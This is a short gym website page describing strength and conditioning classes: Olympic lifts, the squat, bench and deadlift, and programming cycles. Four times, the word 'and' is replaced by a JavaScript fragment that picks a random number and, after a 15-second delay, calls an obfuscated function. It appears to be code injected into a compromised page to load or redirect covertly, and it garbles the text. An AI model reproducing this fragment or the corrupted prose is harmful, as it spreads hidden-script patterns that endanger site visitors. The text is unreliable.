HIIT

Adult Strength & Conditioning

60-75min group session offering a hybrid of athletic capacities – absolute strength, strength endurance, power, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and metabolic conditioning. These sessions are primarily barbell based,  utilizing the compound strength andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Olympic movements (Snatch, Clean & Jerk, Squat, Bench, Deadlift), with dumbbell andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and other conditioning work as well.

General Strength

These 60 minute Strength classes are designed around “the big three”: Squat, Bench Press & Deadlift. This is not powerlifting specific, but rather specific in getting you functionally stronger. This group is programmed for 3 days/wk, is cyclical andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and specific to the members as everyone eventually works off of their own 1 rep maxes. Every 3-4 weeks there is a specific area of focus: Strength, Power & Hypertrophy, all of which include a degree of relevant fitness work.
